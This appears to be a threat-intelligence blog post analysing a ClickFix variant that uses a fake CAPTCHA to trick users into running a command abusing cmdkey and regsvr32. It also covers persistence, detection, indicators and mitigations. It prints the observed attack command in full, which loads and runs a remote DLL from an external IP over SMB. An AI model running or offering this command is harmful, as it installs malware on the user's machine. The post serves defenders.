Stealthy ClickFix Variant Exploits Native Windows Tools to Evade Detection and Deploy Fileless Malware

CyberDefender 8 mins0

The recent research has recently uncovered an advanced evolution of the ClickFix attack technique, highlighting how adversaries continue to refine their methods to evade detection while maintaining execution reliability. This newly observed variant demonstrates a significant shift from traditional payload delivery mechanisms by abusing legitimate Windows utilities such as cmdkey and regsvr32.

Attack Overview

The attack begins with a familiar social engineering tactic: a phishing page disguised as a CAPTCHA verification prompt. Victims are instructed to paste and execute a command via the Windows Run dialog (Win + R). While seemingly harmless, this single action triggers a multi-stage attack chain without dropping a conventional executable onto the system.

The malicious command performs several actions in sequence:

  • Stores attacker-controlled credentials using cmdkey
  • Executes a remote DLL via regsvr32
  • Retrieves payloads from a remote SMB share using a UNC path
  • Uses command chaining (&&, &) to streamline execution
  • Includes misleading comments to appear legitimate

This compact execution chain enables attackers to achieve multiple objectives through a single user action, significantly increasing the success rate of compromise.

Attack Chain

Observed Command:

C:\WINDOWS\system32\cmd.exe /c
cmdkey /add:151.245.195.142 /user:guest &&
start regsvr32 /s \\151.245.195.142\hi\demo.dll &
REM I am not a robot – Cloudflare ID: d7f5a3335794c434

Technical Breakdown

Once executed, the retrieved DLL (demo.dll) initiates persistence mechanisms and prepares the system for second-stage payload delivery. The DLL leverages the DllRegisterServer export function to silently create a scheduled task using schtasks.

A key innovation in this attack is that the scheduled task configuration is not stored locally. Instead, it is dynamically retrieved from a remote XML file hosted on attacker-controlled infrastructure. This allows threat actors to modify payload behavior without redeploying malware, enhancing flexibility and persistence.

Establishing persistence and execute second stage payload

Notable characteristics include:

  • Remote XML-based scheduled task creation
  • Dynamic payload updates without file changes
  • Minimal artifacts left on the infected host
  • Long-term persistence through legitimate system tools

Command and Control (C2) Behavior

The malware communicates with external infrastructure to:

  • Retrieve task configuration files
  • Download additional payloads
  • Maintain operational flexibility

This architecture significantly complicates detection and incident response, as traditional file-based indicators are minimized.

Why This Variant Matters

This ClickFix variant represents a clear evolution in attack sophistication:

  • Moves beyond PowerShell-based techniques
  • Introduces combined abuse of cmdkey and regsvr32
  • Relies entirely on trusted Windows binaries (LOLBins)
  • Blends malicious activity with legitimate user behavior

The result is a low-noise attack chain that is difficult to distinguish from normal system operations.

Detection Opportunities

Despite its stealth, this technique leaves behavioral traces that defenders can monitor:

  • Execution of cmd.exe with chained operators
  • Use of cmdkey targeting external IP addresses
  • Remote DLL execution via UNC paths
  • Scheduled task creation from remote XML sources

Security teams can leverage detection rules such as YARA and Sigma, along with KQL-based hunting queries, to identify suspicious activity patterns.

Indicators of Compromise (IOCs)

Key IOCs associated with this campaign include:

  • Suspicious IP: 151.245.195.142
  • Remote DLL and XML paths via SMB
  • Known file hash signatures

Recommended Mitigations

To defend against such threats:

  • Monitor unusual use of native tools like cmdkey and regsvr32
  • Restrict outbound SMB traffic where possible
  • Implement behavioral detection for command chaining
  • Audit scheduled task creation events
  • Educate users about social engineering tactics like fake CAPTCHAs

Our Perspective on This Emerging Threat

This ClickFix variant is a strong reminder that modern cyber threats are no longer dependent on traditional malware delivery. Instead, attackers are increasingly “living off the land,” exploiting trusted system utilities to blend into normal operations. This approach not only reduces detection rates but also shifts the burden onto behavioral analysis rather than signature-based defenses.

What stands out most is the strategic use of remote configuration via XML files. This design gives attackers the ability to continuously evolve their payloads without touching the compromised endpoint again—an operational advantage that significantly extends the lifecycle of an attack.

From a defensive standpoint, this highlights a critical gap in many organizations: over-reliance on static detection methods. Security teams must prioritize visibility into process behavior, command-line activity, and network interactions rather than focusing solely on file-based threats.

Additionally, the human factor remains the weakest link. The success of this attack still depends on convincing a user to execute a command. This reinforces the importance of continuous security awareness training, especially around emerging social engineering techniques.

Ultimately, this variant reflects a broader trend in cybersecurity—stealth, flexibility, and abuse of trust. Organizations that fail to adapt to this shift risk being outpaced by increasingly sophisticated adversaries.

CyberDefender